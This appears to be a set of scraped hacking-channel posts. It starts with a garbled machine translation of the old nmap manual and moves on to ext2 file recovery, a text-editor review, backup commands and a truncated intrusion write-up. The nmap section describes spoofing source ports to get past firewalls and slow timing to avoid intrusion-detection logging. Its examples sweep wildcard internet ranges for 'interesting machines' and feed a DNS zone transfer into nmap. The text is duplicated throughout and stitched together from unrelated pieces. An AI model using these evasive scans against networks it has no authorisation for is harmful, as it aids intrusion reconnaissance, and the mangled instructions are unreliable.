PART 2 NMAP FULL
-g
Set the source port number in the scan. Many "naive" firewalls or packet filters, except for the ones they establish that allow DNS (53) or FTP-DATA (20) packets to come in to establish a connection, are generally filtered. Obviously this is a very thoughtless approach, because intruders can Easily edit a source port from FTP or DNS. For example, if you cannot get information from a host's host: port through TCP ISN, then by using the -g command, nmap will change the source port and try again. It should be understood that there may be a small delay in using this option, because I sometimes need to store useful information in the source port number.
-M
sets the maximum number of sockets for parallel TCP connect () scans (default) . This is quite effective for moderately slowing down the scan, it can avoid crashing the remote host. Another way is to use -sS.
Timing options
-------- *
Although nmap is generally able to complete the scanning task as quickly as possible in runtime, there are occasionally some hosts / ports that cannot be detected. This may be The default time strategy of nmap is not consistent with your goal (equivalent to the setting of timeout). Here are some options to control the scanning time:
-T
This is a parameter setting that can be used to conveniently express the priority of the nmap time policy. Paranoid mode scans at extremely slow speeds to avoid recording by digital recording systems. It makes scans continuous rather than concurrent and usually waits at least five minutes before sending a packet. Sneaky is similar, except that it sends a packet every 15 seconds. Polite mode is used to reduce the network load to reduce the possibility of crashes. It continuously sends probes and waits for 0.4 seconds between the two packets. Normal is the normal usage of nmap, and it does its best to scan as fast as possible-unless the host or port connection is lost. In Aggressive mode, a five minute timeout is set for each host, and each probe waits for no more than 1.25 seconds. Insane mode is for adapting to very fast networks or you don't care about losing some information-because it's too fast! Its timeout is set to 75 seconds and it only waits for 0.3 seconds for a response. It allows "sweeping" a fast network system :). You can also use numbers (0-5) to represent parameters, such as' -t 0 'Means Paranoid and' -t 5 'stands for Insane mode. Note that these time settings cannot be combined in the underlying control. (NOT be used in combination with the lower level controls given below.)
--Host_timeout
specifies the total scan time of nmap for a certain IP. If it exceeds, it will not be processed. The default is not set.
--max_rtt_timeout
specifies the maximum time for nmap to respond to a probe from the remote end. The default is 9000.
--initial_rtt_timeout
specifies the timeout time of the initial probe. This is usually effective when scanning hosts protected by a firewall with -P0. nmap will get a good RTT assessment and a few initial probes by pinging. The default value is 6000.
--max_parallelism
Specify the maximum number of parallel scans allowed by nmap. Set to 1 to indicate that nmap scans only one port at a time. It will also affect other scans such as ping sweep, RPC scan, etc.
--scan_delay
specifies the minimum time between two probes that nmap must wait. This is a way to reduce the network load and make scanning less visible under the records of the integrated data store.
Target description
-------- *
All options without parameters will be regarded as the target host description of nmap. The simplest example is just listing a single host name or IP address on the command line. If you want to scan a subnet of an IP address, you can add '/ mask' to the host name and IP address. The mask must be between 0 (scanning the entire network) and 32 (specific single host). Use / 24 to scan for a class C address, and / 16 to scan for a class B address
...
-g
Set the source port number in the scan. Many "naive" firewalls or packet filters, except for the ones they establish that allow DNS (53) or FTP-DATA (20) packets to come in to establish a connection, are generally filtered. Obviously this is a very thoughtless approach, because intruders can Easily edit a source port from FTP or DNS. For example, if you cannot get information from a host's host: port through TCP ISN, then by using the -g command, nmap will change the source port and try again. It should be understood that there may be a small delay in using this option, because I sometimes need to store useful information in the source port number.
-M
sets the maximum number of sockets for parallel TCP connect () scans (default) . This is quite effective for moderately slowing down the scan, it can avoid crashing the remote host. Another way is to use -sS.
Timing options
-------- *
Although nmap is generally able to complete the scanning task as quickly as possible in runtime, there are occasionally some hosts / ports that cannot be detected. This may be The default time strategy of nmap is not consistent with your goal (equivalent to the setting of timeout). Here are some options to control the scanning time:
-T
This is a parameter setting that can be used to conveniently express the priority of the nmap time policy. Paranoid mode scans at extremely slow speeds to avoid recording by digital recording systems. It makes scans continuous rather than concurrent and usually waits at least five minutes before sending a packet. Sneaky is similar, except that it sends a packet every 15 seconds. Polite mode is used to reduce the network load to reduce the possibility of crashes. It continuously sends probes and waits for 0.4 seconds between the two packets. Normal is the normal usage of nmap, and it does its best to scan as fast as possible-unless the host or port connection is lost. In Aggressive mode, a five minute timeout is set for each host, and each probe waits for no more than 1.25 seconds. Insane mode is for adapting to very fast networks or you don't care about losing some information-because it's too fast! Its timeout is set to 75 seconds and it only waits for 0.3 seconds for a response. It allows "sweeping" a fast network system :). You can also use numbers (0-5) to represent parameters, such as' -t 0 'Means Paranoid and' -t 5 'stands for Insane mode. Note that these time settings cannot be combined in the underlying control. (NOT be used in combination with the lower level controls given below.)
--Host_timeout
specifies the total scan time of nmap for a certain IP. If it exceeds, it will not be processed. The default is not set.
--max_rtt_timeout
specifies the maximum time for nmap to respond to a probe from the remote end. The default is 9000.
--initial_rtt_timeout
specifies the timeout time of the initial probe. This is usually effective when scanning hosts protected by a firewall with -P0. nmap will get a good RTT assessment and a few initial probes by pinging. The default value is 6000.
--max_parallelism
Specify the maximum number of parallel scans allowed by nmap. Set to 1 to indicate that nmap scans only one port at a time. It will also affect other scans such as ping sweep, RPC scan, etc.
--scan_delay
specifies the minimum time between two probes that nmap must wait. This is a way to reduce the network load and make scanning less visible under the records of the integrated data store.
Target description
-------- *
All options without parameters will be regarded as the target host description of nmap. The simplest example is just listing a single host name or IP address on the command line. If you want to scan a subnet of an IP address, you can add '/ mask' to the host name and IP address. The mask must be between 0 (scanning the entire network) and 32 (specific single host). Use / 24 to scan for a class C address, and / 16 to scan for a class B address
...
nmap also has some more useful symbolic explanations that let you use list / ranges to specify IP addresses for each element. For example, if you want to scan a class B URL 128.210. *. *, You can use '128.210. *. *' Or '128.210.0-255.0-255' or even '128.210.1-50,51-255.1,2,3 , 4,5-255 '. Of course, you can also use the mask mentioned above: '128.210.0.0/16'. All of these are equivalent. Remember that most shells require delimiters such as quotes when you use '*'.
Another interesting thing is that you can "split" the entire network in other ways. For example, you can use '*. *. 5.6-7' to scan all IP addresses ending in .5.6 or .5.7. For more information, you can look at the example section.
Scanning example
-------- *
Here are some examples of scanning using nmap, from the simplest to the most complex ones. Note that there are real numbers and some real domain names-this makes the scanning behavior more specific. Here you can replace the addresses / names with your own network name. Although the analysis of the results of the port scan may make some people vulnerable, I don't think it is illegal. I have scanned hundreds or thousands of machines but received only one complaint. But I am not a lawyer and some people are annoyed by nmap detection, so it is best to scan or-risk after getting permission, the consequences are at your own risk.
nmap -v target.example.com
scans all reserved TCP ports on target.example.com in this way, -v means use verbose mode.
nmap -sS -O target.example.com/24
This will start a half-open scan of SYN. The target is the class C subnet where target.example.com is located. It also tries to determine what system is running on it. . This requires root privileges because it uses half-open scanning and system detection.
nmap -sX -p 22,53,110,143,4564 128.210. *. 1-127
Send a Xmas tree to scan within half of the subnet where Class B 128.210 is located. We will check whether the system is running sshd, DNS, pop3d, imapd, or port 4564. It should be noted that due to the imperfectness of the Microsoft TCP stack, Xmas scanning will not run successfully on its platform. The same problem may exist in CISCO, IRIX, HP / UX, and BSDI.
nmap -v -p 80 '*. *. 2.3-5'
This is a way to locate a domain (divide the entire network into many small parts) and then scan. All IP addresses ending in .2.3, .2.4, or .2.5 are scanned here. You can also use -sS if you are ROOT. Similarly, you can search for more interesting machines starting from 127. You can replace the preceding asterisk with '127-222'-IMHO, there are a lot of interesting machines in that area.
host -l company.com | cut '-d' -f 4 | ./nmap -v -i-
do a DNS zone transfer to find the host on company.com and send the IP address to nmap (feed the IP addresses to nmap). This command runs under my GNU / Linux platform, you may need to use different option parameters or different operating systems.
Bedbugs-
*
bugs? What's wrong? If you find it, please tell me, the revised version will be more perfect :), remember to give it to me along with the "fingerprints" of the OS, so that I can have enough data to modify ...
Author
---- *
Fyodor
issued
---- * The
latest version of nmap can be obtained from the following URL (the following is the copyright information)
http://www.insecure.org/nmap/
nmap is (C) 1997, 1998, 1999 by Fyodor ( fyodor@dhp.com , fyodor@insecure.org )
libpcap is also distributed along with nmap. It is copy-righted by Van Jacobson, Craig Leres and Steven McCanne, all of the Lawrence Berkeley National Laboratory, University of California, Berkeley, CA. The Version distributed with nmap may be modified, Pristine sources are available fromftp: //ftp.ee.lbl.gov/libpcap.tar.Z.
Another interesting thing is that you can "split" the entire network in other ways. For example, you can use '*. *. 5.6-7' to scan all IP addresses ending in .5.6 or .5.7. For more information, you can look at the example section.
Scanning example
-------- *
Here are some examples of scanning using nmap, from the simplest to the most complex ones. Note that there are real numbers and some real domain names-this makes the scanning behavior more specific. Here you can replace the addresses / names with your own network name. Although the analysis of the results of the port scan may make some people vulnerable, I don't think it is illegal. I have scanned hundreds or thousands of machines but received only one complaint. But I am not a lawyer and some people are annoyed by nmap detection, so it is best to scan or-risk after getting permission, the consequences are at your own risk.
nmap -v target.example.com
scans all reserved TCP ports on target.example.com in this way, -v means use verbose mode.
nmap -sS -O target.example.com/24
This will start a half-open scan of SYN. The target is the class C subnet where target.example.com is located. It also tries to determine what system is running on it. . This requires root privileges because it uses half-open scanning and system detection.
nmap -sX -p 22,53,110,143,4564 128.210. *. 1-127
Send a Xmas tree to scan within half of the subnet where Class B 128.210 is located. We will check whether the system is running sshd, DNS, pop3d, imapd, or port 4564. It should be noted that due to the imperfectness of the Microsoft TCP stack, Xmas scanning will not run successfully on its platform. The same problem may exist in CISCO, IRIX, HP / UX, and BSDI.
nmap -v -p 80 '*. *. 2.3-5'
This is a way to locate a domain (divide the entire network into many small parts) and then scan. All IP addresses ending in .2.3, .2.4, or .2.5 are scanned here. You can also use -sS if you are ROOT. Similarly, you can search for more interesting machines starting from 127. You can replace the preceding asterisk with '127-222'-IMHO, there are a lot of interesting machines in that area.
host -l company.com | cut '-d' -f 4 | ./nmap -v -i-
do a DNS zone transfer to find the host on company.com and send the IP address to nmap (feed the IP addresses to nmap). This command runs under my GNU / Linux platform, you may need to use different option parameters or different operating systems.
Bedbugs-
*
bugs? What's wrong? If you find it, please tell me, the revised version will be more perfect :), remember to give it to me along with the "fingerprints" of the OS, so that I can have enough data to modify ...
Author
---- *
Fyodor
issued
---- * The
latest version of nmap can be obtained from the following URL (the following is the copyright information)
http://www.insecure.org/nmap/
nmap is (C) 1997, 1998, 1999 by Fyodor ( fyodor@dhp.com , fyodor@insecure.org )
libpcap is also distributed along with nmap. It is copy-righted by Van Jacobson, Craig Leres and Steven McCanne, all of the Lawrence Berkeley National Laboratory, University of California, Berkeley, CA. The Version distributed with nmap may be modified, Pristine sources are available fromftp: //ftp.ee.lbl.gov/libpcap.tar.Z.
nmap.org
Nmap: the Network Mapper - Free Security Scanner
Nmap Free Security Scanner, Port Scanner, & Network Exploration Tool. Download open source software for Linux, Windows, UNIX, FreeBSD, etc.
NMAP 3
This program is free software; you can redistribute it and / or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; Version 2. This guarantees your right to use, modify, and redistribute Nmap under certain conditions. If this license is unacceptable to you, Insecure.Org may be willing to sell alternative licenses (contact fyodor@dhp.com ).
🦑This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details (it is in the COPYING file of the nmap distribution).
It should also be noted that Nmap has been known to crash certain poorly written applications, TCP / IP stacks, and even operating systems. Nmap should never be run against mission critical systems unless you are prepared to suffer downtime. We acknowledge here that Nmap may crash your systems or networks and we disclaim all liability for any damage or problems Nmap could cause.
All versions of Nmap equal to or greater than 2.0 are believed (through informal testing) to be Year 2000 (Y2K) compliant in all respects. That being said, we reiterate that Nmap comes with no warranty. There is no reason to believe versions earlier than 2.0 are susceptible to problems, but we have not tested them.
Attached:
The operating platform of nmap
-------------- *
Portability
NMAP is developed under LINUX, but now it can be used on many platforms Run on. Thanks to Lamont Granquist for his great help in running the NMAP automated console on many platforms I can't access. The following is a brief list of systems that support NAMP:
OS Compiles TCP scan (-sT) SYN scan (-sS) FIN scan (-sF) Frag scan (-f) OS Detection (-O)
Linux Yes! Yes! Yes! Yes! Yes! Yes!
FreeBSD Yes! Yes! Yes! Yes! Yes! Yes!
OpenBSD Yes! Yes! Yes! Yes! Yes! Yes!
NetBSD Yes! Yes! Yes! Yes! Yes! Yes!
Solaris 2.4-7 Yes! Yes! Yes! Yes! No :( Yes!
SunOS 4.1.4 w / gcc Yes! Yes! Yes! Yes! No :( Yes!
IRIX 5.3-6.4 Yes! Yes! Yes! Yes! No: (Yes!
HP / UX 10.20 Yes! Yes! Yes! Yes! Yes! Unknown
BSDI 2.1 and up Yes! Yes! Yes! Yes! Unknown Yes!
AIX (use cc, not gcc) Yes! Yes! No :( No: (No :( No :(
Digital UNIX / Alpha Yes! Yes! POSSIBLE KERNEL PANIC!
Cray UNICOS 10.0 Yes! Yes! No :( No :( No :( No :(
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
This program is free software; you can redistribute it and / or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; Version 2. This guarantees your right to use, modify, and redistribute Nmap under certain conditions. If this license is unacceptable to you, Insecure.Org may be willing to sell alternative licenses (contact fyodor@dhp.com ).
🦑This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details (it is in the COPYING file of the nmap distribution).
It should also be noted that Nmap has been known to crash certain poorly written applications, TCP / IP stacks, and even operating systems. Nmap should never be run against mission critical systems unless you are prepared to suffer downtime. We acknowledge here that Nmap may crash your systems or networks and we disclaim all liability for any damage or problems Nmap could cause.
All versions of Nmap equal to or greater than 2.0 are believed (through informal testing) to be Year 2000 (Y2K) compliant in all respects. That being said, we reiterate that Nmap comes with no warranty. There is no reason to believe versions earlier than 2.0 are susceptible to problems, but we have not tested them.
Attached:
The operating platform of nmap
-------------- *
Portability
NMAP is developed under LINUX, but now it can be used on many platforms Run on. Thanks to Lamont Granquist for his great help in running the NMAP automated console on many platforms I can't access. The following is a brief list of systems that support NAMP:
OS Compiles TCP scan (-sT) SYN scan (-sS) FIN scan (-sF) Frag scan (-f) OS Detection (-O)
Linux Yes! Yes! Yes! Yes! Yes! Yes!
FreeBSD Yes! Yes! Yes! Yes! Yes! Yes!
OpenBSD Yes! Yes! Yes! Yes! Yes! Yes!
NetBSD Yes! Yes! Yes! Yes! Yes! Yes!
Solaris 2.4-7 Yes! Yes! Yes! Yes! No :( Yes!
SunOS 4.1.4 w / gcc Yes! Yes! Yes! Yes! No :( Yes!
IRIX 5.3-6.4 Yes! Yes! Yes! Yes! No: (Yes!
HP / UX 10.20 Yes! Yes! Yes! Yes! Yes! Unknown
BSDI 2.1 and up Yes! Yes! Yes! Yes! Unknown Yes!
AIX (use cc, not gcc) Yes! Yes! No :( No: (No :( No :(
Digital UNIX / Alpha Yes! Yes! POSSIBLE KERNEL PANIC!
Cray UNICOS 10.0 Yes! Yes! No :( No :( No :( No :(
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Miscellaneous Tools-Recover Deleted Files in ext2 File System :
twitter.com/UnderCodeNews
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) if you accidentally accidentally deleted an important file, such as rm -rf kkk And kkk is a very important file for you, you must be very painful, at this time you must not panic, you should stop writing any files to your hard disk immediately. It is completely recoverable. (I wrote the following specifically for the ext2 file system, other file systems have methods, I will write later):
#debugfs / dev / hda1 (the partition where the deleted file is located)
debugfs: lsdel
can list your recent The inode table of the deleted file is roughly as follows:
2) Inode Owner Mode Size Blocks Time deleted
3) This is the node table number, owner, file attributes (that is, read, write, etc.), size, block (generally 1block = 1K), when deleted time. With this information, you should be able to quickly determine which file you want to recover. Then use
debugfs: dump <the value of the inode table you want to restore> / home / directory (to that directory)
OK! It's that simple, you can find it in / home / directory.
4) Of course, if you have a lot of files, doing this one by one is definitely troublesome, you can download some tools. I give it here:
http://revocer.sourceforge.net/linux/recover.
Everyone, try it. If you have any difficulties, please send here,
5) During the practice of the brothers, such information appeared, and they did not know how to deal with it. Please enlighten me.
311543 0 100600 7603556 14/14 Wed Oct 2 18:39:21 2002
586046 0 100644 7044 2/2 Wed Oct 2 18:51:50 2002
760593 0 100600 363 1/1 Wed Oct 2 18:53:35 2002
9551 deleted inodes found.
debugfs: dump 311543
dump: Usage: dump_inode [-p] <file> <output_file>
debugfs: dump 311543 / root
311543: File not found by ext2_lookup
debugfs:
6)wants to restore this 311543 because I am in the / root directory I deleted a file, I saw it was 311543, but using the following command to restore, the above prompt appeared
7) You should be like this.
Debugfs: dump <311543> / root / ppp (any file name).
Try again . Did you
succeed?
8) I am now under windows, and my linux is JFS. Recovery is more convenient. Etc. Will I switch to LINUX and build an ext2 system, I have tried it before, and it must be
9) ok . Dude is terrific, serve it, and it will be OK. . . .
Now my brother has a question: I deleted a .tar.gz file, but after the restoration is complete, I cannot use
#tar zxvf * tar.gz to extract it.
10) The other is how to restore the original file name. For example, I deleted wine.tar.gz, but I ca n’t remember what the specific file name is, but I want to restore the original file name, such as I deleted important files in the system, but I don't remember what kind of file name it is, but this file name is extremely important to the system, such as mozilla under / usr / bin. How can I do this? ?
11) The main reason is to know why. The answer is simple. To know the file name, use
debugfs: ls -d.
12) As for the file cannot be used, it is because the dump is a continuous block, and your file may not be a continuous block.
Use debugfs: stat <inode> to see its status, and then dd them down one by one (of course there are tools to save a lot of effort).
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Miscellaneous Tools-Recover Deleted Files in ext2 File System :
twitter.com/UnderCodeNews
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) if you accidentally accidentally deleted an important file, such as rm -rf kkk And kkk is a very important file for you, you must be very painful, at this time you must not panic, you should stop writing any files to your hard disk immediately. It is completely recoverable. (I wrote the following specifically for the ext2 file system, other file systems have methods, I will write later):
#debugfs / dev / hda1 (the partition where the deleted file is located)
debugfs: lsdel
can list your recent The inode table of the deleted file is roughly as follows:
2) Inode Owner Mode Size Blocks Time deleted
3) This is the node table number, owner, file attributes (that is, read, write, etc.), size, block (generally 1block = 1K), when deleted time. With this information, you should be able to quickly determine which file you want to recover. Then use
debugfs: dump <the value of the inode table you want to restore> / home / directory (to that directory)
OK! It's that simple, you can find it in / home / directory.
4) Of course, if you have a lot of files, doing this one by one is definitely troublesome, you can download some tools. I give it here:
http://revocer.sourceforge.net/linux/recover.
Everyone, try it. If you have any difficulties, please send here,
5) During the practice of the brothers, such information appeared, and they did not know how to deal with it. Please enlighten me.
311543 0 100600 7603556 14/14 Wed Oct 2 18:39:21 2002
586046 0 100644 7044 2/2 Wed Oct 2 18:51:50 2002
760593 0 100600 363 1/1 Wed Oct 2 18:53:35 2002
9551 deleted inodes found.
debugfs: dump 311543
dump: Usage: dump_inode [-p] <file> <output_file>
debugfs: dump 311543 / root
311543: File not found by ext2_lookup
debugfs:
6)wants to restore this 311543 because I am in the / root directory I deleted a file, I saw it was 311543, but using the following command to restore, the above prompt appeared
7) You should be like this.
Debugfs: dump <311543> / root / ppp (any file name).
Try again . Did you
succeed?
8) I am now under windows, and my linux is JFS. Recovery is more convenient. Etc. Will I switch to LINUX and build an ext2 system, I have tried it before, and it must be
9) ok . Dude is terrific, serve it, and it will be OK. . . .
Now my brother has a question: I deleted a .tar.gz file, but after the restoration is complete, I cannot use
#tar zxvf * tar.gz to extract it.
10) The other is how to restore the original file name. For example, I deleted wine.tar.gz, but I ca n’t remember what the specific file name is, but I want to restore the original file name, such as I deleted important files in the system, but I don't remember what kind of file name it is, but this file name is extremely important to the system, such as mozilla under / usr / bin. How can I do this? ?
11) The main reason is to know why. The answer is simple. To know the file name, use
debugfs: ls -d.
12) As for the file cannot be used, it is because the dump is a continuous block, and your file may not be a continuous block.
Use debugfs: stat <inode> to see its status, and then dd them down one by one (of course there are tools to save a lot of effort).
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Twitter
UNDERCODE TESTING (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE TESTING (@UndercodeNews). 𝔸𝕕𝕧𝕒𝕟𝕔𝕖𝕕 & 𝔸𝕝𝕨𝕒𝕪𝕤 𝕌𝕡𝕕𝕒𝕥𝕖𝕕. Lebanon-North
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Bluefish web editor based on Linux text mode:
fb.com/UnderCodeTesting
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) Bluefish advertises itself as "an editor for skilled web designers and programmers", but its UI is very intuitive, and any beginner can quickly get started and discover and continually accumulate Master its other features. If you need a text editor that can design web code, then it will be a very good software. The overall impression it gives me is professional but not intimidating, and the combination of text and icons is good.
2) Bluefish provides many common HTML task options, such as fonts, tables, etc., and of course links. This software uses a less common "anchor" to indicate clickable links. The Link Description dialog box even provides Java script event functions such as OnClick and OnMouseover.
3) It also has other dialogs to create text in PHP and SQL tasks. Like many Apache and C options, you can also group files by project for development. The search and replace function is also very good, it also supports regular expressions, and you can also customize syntax highlighting for multiple languages.
4) Let me talk about some of its shortcomings. If you need some documentation help, then you need to open a separate document, because help is not integrated with this application. Its instructions are very extensive, and if you are patient, you can certainly find what you want. For example, for me, spell checking didn't let me find it quickly, but after I read the instructions, I found that you must install a standalone open source Aspell application to be able to perform spell checking.
5) Macros are operated through a "custom menu", where you can create your own text strings, HTML opening and closing tags, or search and replace commands. The creation of text strings includes some dialog boxes with additional features, which are very simple to use.
6) Somewhat disappointingly, in such an intuitive interface, I didn't find the "Edit" custom menu for the macro I created, but if you refer to the steps on the instructions, everything is clear. Macro functions may not be so powerful compared to some other applications. For example, I cannot find how to use other Bluefish commands in the custom menu, but they are very convenient for repeated input.
7) Finally, Bluefish does not position itself as an application for writing, nor does it have some commands for text manipulation, such as changing capital letters or merging or splitting lines.
8) That said, if you are looking for a moderately functional text-based web code editing application, Bluefish is definitely worth a try.
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Bluefish web editor based on Linux text mode:
fb.com/UnderCodeTesting
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) Bluefish advertises itself as "an editor for skilled web designers and programmers", but its UI is very intuitive, and any beginner can quickly get started and discover and continually accumulate Master its other features. If you need a text editor that can design web code, then it will be a very good software. The overall impression it gives me is professional but not intimidating, and the combination of text and icons is good.
2) Bluefish provides many common HTML task options, such as fonts, tables, etc., and of course links. This software uses a less common "anchor" to indicate clickable links. The Link Description dialog box even provides Java script event functions such as OnClick and OnMouseover.
3) It also has other dialogs to create text in PHP and SQL tasks. Like many Apache and C options, you can also group files by project for development. The search and replace function is also very good, it also supports regular expressions, and you can also customize syntax highlighting for multiple languages.
4) Let me talk about some of its shortcomings. If you need some documentation help, then you need to open a separate document, because help is not integrated with this application. Its instructions are very extensive, and if you are patient, you can certainly find what you want. For example, for me, spell checking didn't let me find it quickly, but after I read the instructions, I found that you must install a standalone open source Aspell application to be able to perform spell checking.
5) Macros are operated through a "custom menu", where you can create your own text strings, HTML opening and closing tags, or search and replace commands. The creation of text strings includes some dialog boxes with additional features, which are very simple to use.
6) Somewhat disappointingly, in such an intuitive interface, I didn't find the "Edit" custom menu for the macro I created, but if you refer to the steps on the instructions, everything is clear. Macro functions may not be so powerful compared to some other applications. For example, I cannot find how to use other Bluefish commands in the custom menu, but they are very convenient for repeated input.
7) Finally, Bluefish does not position itself as an application for writing, nor does it have some commands for text manipulation, such as changing capital letters or merging or splitting lines.
8) That said, if you are looking for a moderately functional text-based web code editing application, Bluefish is definitely worth a try.
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Facebook
UndercOde Testing Company
UndercOde Testing Company. 97 likes · 3 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Make Incremental Backups linux :
T.me/underCodeTesting
1) The first step in creating an incremental backup is to generate a list of files that have changed in the past This is usually achieved by the find command.
2) For example to generate a list of files that have changed in the last 24 hours use:
find / -mtime -1! -Type d -print> /tmp/filelist.daily
3) where the -mtime -1 option will make find change the past 24 hours to find out through the archives; -type d will find files from the list!
remove the name of the directory to find all files similar changes in the past week off with:.
> find / -mtime -7 -print> / tmp /filelist.weekly
4) when generating a list of files to be backed up, put a file in the list, use the tar -T option to specify a file that contains
a list of files to be backed up. for example listed in the file / tmp / filelist Back up all files in .daily to device / dev / fd0, use:
> tar -cv -T /tmp/filelist.daily -f / dev / fd0
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Make Incremental Backups linux :
T.me/underCodeTesting
1) The first step in creating an incremental backup is to generate a list of files that have changed in the past This is usually achieved by the find command.
2) For example to generate a list of files that have changed in the last 24 hours use:
find / -mtime -1! -Type d -print> /tmp/filelist.daily
3) where the -mtime -1 option will make find change the past 24 hours to find out through the archives; -type d will find files from the list!
remove the name of the directory to find all files similar changes in the past week off with:.
> find / -mtime -7 -print> / tmp /filelist.weekly
4) when generating a list of files to be backed up, put a file in the list, use the tar -T option to specify a file that contains
a list of files to be backed up. for example listed in the file / tmp / filelist Back up all files in .daily to device / dev / fd0, use:
> tar -cv -T /tmp/filelist.daily -f / dev / fd0
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Telegram
UNDERCODE TESTING OFFICIAL
🦑 WELCOME TO UNDERCODE TESTING FOR LEARN HACKING & PROGRAMMING & MORE...
🅶🅸🆃🅻🄰🄱
@UndercOdeTesting
🆈🄾🆄🆃🆄🄱🅴
@UnderCodeTestingCompany
🅵🄰🅲🅴🄱🄾🄾🅺
@UndercOdeTesting
🅸🅽🆂🆃🄰🅶🆁🄰🅼
@UndercOdeTestingCompany
🆃🆆🅸🆃🆃🅴🆁
@UnderCodeNews
🅶🅸🆃🅻🄰🄱
@UndercOdeTesting
🆈🄾🆄🆃🆄🄱🅴
@UnderCodeTestingCompany
🅵🄰🅲🅴🄱🄾🄾🅺
@UndercOdeTesting
🅸🅽🆂🆃🄰🅶🆁🄰🅼
@UndercOdeTestingCompany
🆃🆆🅸🆃🆃🅴🆁
@UnderCodeNews
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Make Incremental Backups linux :
T.me/underCodeTesting
1) The first step in creating an incremental backup is to generate a list of files that have changed in the past This is usually achieved by the find command.
2) For example to generate a list of files that have changed in the last 24 hours use:
find / -mtime -1! -Type d -print> /tmp/filelist.daily
3) where the -mtime -1 option will make find change the past 24 hours to find out through the archives; -type d will find files from the list!
remove the name of the directory to find all files similar changes in the past week off with:.
> find / -mtime -7 -print> / tmp /filelist.weekly
4) when generating a list of files to be backed up, put a file in the list, use the tar -T option to specify a file that contains
a list of files to be backed up. for example listed in the file / tmp / filelist Back up all files in .daily to device / dev / fd0, use:
> tar -cv -T /tmp/filelist.daily -f / dev / fd0
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Make Incremental Backups linux :
T.me/underCodeTesting
1) The first step in creating an incremental backup is to generate a list of files that have changed in the past This is usually achieved by the find command.
2) For example to generate a list of files that have changed in the last 24 hours use:
find / -mtime -1! -Type d -print> /tmp/filelist.daily
3) where the -mtime -1 option will make find change the past 24 hours to find out through the archives; -type d will find files from the list!
remove the name of the directory to find all files similar changes in the past week off with:.
> find / -mtime -7 -print> / tmp /filelist.weekly
4) when generating a list of files to be backed up, put a file in the list, use the tar -T option to specify a file that contains
a list of files to be backed up. for example listed in the file / tmp / filelist Back up all files in .daily to device / dev / fd0, use:
> tar -cv -T /tmp/filelist.daily -f / dev / fd0
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Telegram
UNDERCODE TESTING OFFICIAL
🦑 WELCOME TO UNDERCODE TESTING FOR LEARN HACKING & PROGRAMMING & MORE...
🅶🅸🆃🅻🄰🄱
@UndercOdeTesting
🆈🄾🆄🆃🆄🄱🅴
@UnderCodeTestingCompany
🅵🄰🅲🅴🄱🄾🄾🅺
@UndercOdeTesting
🅸🅽🆂🆃🄰🅶🆁🄰🅼
@UndercOdeTestingCompany
🆃🆆🅸🆃🆃🅴🆁
@UnderCodeNews
🅶🅸🆃🅻🄰🄱
@UndercOdeTesting
🆈🄾🆄🆃🆄🄱🅴
@UnderCodeTestingCompany
🅵🄰🅲🅴🄱🄾🄾🅺
@UndercOdeTesting
🅸🅽🆂🆃🄰🅶🆁🄰🅼
@UndercOdeTestingCompany
🆃🆆🅸🆃🆃🅴🆁
@UnderCodeNews
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Tracking a hack full tutorial by undercode :
t.me/undercodeTesting
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) I check my machine, the unexpected discovery was hacked
actually my own mistakes, not patched wuftpd26, but also Without changing / etc / ftpusers,
people can easily use wuftpd26's remote vulnerability to enter my machine with anonymous users. However, this friend apparently used the rootkit without consideration
🦑 As a result, the output of ps is as follows:
[root @ ns] # ps
PID TTY STAT TIME COMMAND
